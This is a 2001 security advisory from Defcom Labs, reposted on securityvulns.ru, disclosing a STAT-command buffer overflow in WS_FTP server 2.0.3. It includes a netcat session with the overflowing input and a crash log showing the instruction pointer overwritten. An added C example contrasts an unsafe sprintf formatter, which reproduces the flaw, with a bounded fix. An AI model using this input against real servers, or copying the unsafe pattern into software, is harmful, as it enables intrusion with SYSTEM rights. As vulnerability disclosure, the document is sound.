[EN] securityvulns.ru

From: andreas junestam <andreas.junestam_(at)_defcom.com>
Date: 05.11.2001
Subject: def-2001-31

======================================================================
                 Defcom Labs Advisory def-2001-31

               WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
 The parsing code for the STAT command suffers from a buffer
 overflow. By sending a STAT command followed by an argument of more
 than 479 bytes (475 bytes plus the new return address), a buffer is
 overflowed and EIP is overwritten. The exact overflow length depends
 on the length of the server name, because the argument, the server
 name and some more information are wsprintf'ed together into the
 buffer. A proof-of-concept exploit is attached to the advisory.

 C:\tools\web>nc localhost 21
 220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
 220-Wed Aug 08 19:57:40 2001
 220-30 days remaining on evaluation.
 220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
 user ftp
 331 Password required
 pass ftp
 230 user logged in
 stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAA

 0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
 SetFolder = C:\program\iFtpSvc\helig
 SetFolder = C:\program\iFtpSvc\helig\public
 SetFolder = C:/program/iFtpSvc/helig
 0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
 (A1)
 Access violation - code c0000005 (first chance)
 eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
 esi=0067c280 edi=00130178
 eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
 41414141 ??               ???
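The formatting pattern the advisory describes, as an added example that is neither Ipswitch's code nor the advisory's: a fixed reply buffer filled wsprintf-style with the server name and the STAT argument, next to a bounded version that rejects any argument the buffer cannot hold. The 475-byte buffer is the figure given above; the reply text, function names and the server name "helig" (taken from the session above) are assumptions.

```c
#include <stdio.h>
#include <string.h>
#define STAT_BUF 475   /* assumed size of the fixed reply buffer */

/* Unbounded form mirroring the defect the advisory describes: server name and
 * STAT argument formatted into a fixed buffer with no length check (wsprintf
 * style).  Shown for contrast only; nothing below calls it. */
void format_stat_reply_unsafe(char *buf, const char *server, const char *arg)
{
    sprintf(buf, "211-%s status: %s", server, arg);
}

/* Bounded form: snprintf reports the length the full reply would have had,
 * so n >= buflen means it did not fit; reject rather than truncate or
 * overrun.  Returns 0 on success, -1 on rejection. */
int format_stat_reply_safe(char *buf, size_t buflen,
                           const char *server, const char *arg)
{
    int n = snprintf(buf, buflen, "211-%s status: %s", server, arg);
    if (n < 0 || (size_t)n >= buflen) {
        snprintf(buf, buflen, "501 Argument too long");
        return -1;
    }
    return 0;
}

/* Longest argument that still fits: buffer minus fixed text, server name and
 * NUL.  This is the server-name dependence the advisory notes. */
size_t max_stat_arg(size_t buflen, const char *server)
{
    size_t fixed = strlen("211- status: ") + strlen(server) + 1;
    return buflen > fixed ? buflen - fixed : 0;
}

/* Constructed input: an argument of arglen 'A's, as in the advisory's
 * session; reports whether the bounded formatter accepts it. */
int accepts_arg_of_len(const char *server, size_t arglen)
{
    char buf[STAT_BUF], arg[1024];
    if (arglen >= sizeof arg) return -1;
    memset(arg, 'A', arglen); arg[arglen] = '\0';
    return format_stat_reply_safe(buf, sizeof buf, server, arg);
}

int main(void)
{
    printf("helig: longest accepted argument %zu bytes; 600 bytes -> %d\n",
           max_stat_arg(STAT_BUF, "helig"), accepts_arg_of_len("helig", 600));
    return 0;
}
```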

---------------------------=[Workaround]=-----------------------------
Download the new version (2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 8th of
August, 2001. A patch has been released.

======================================================================
           This release was brought to you by Defcom Labs

         labs@defcom.com             http://labs.defcom.com
======================================================================
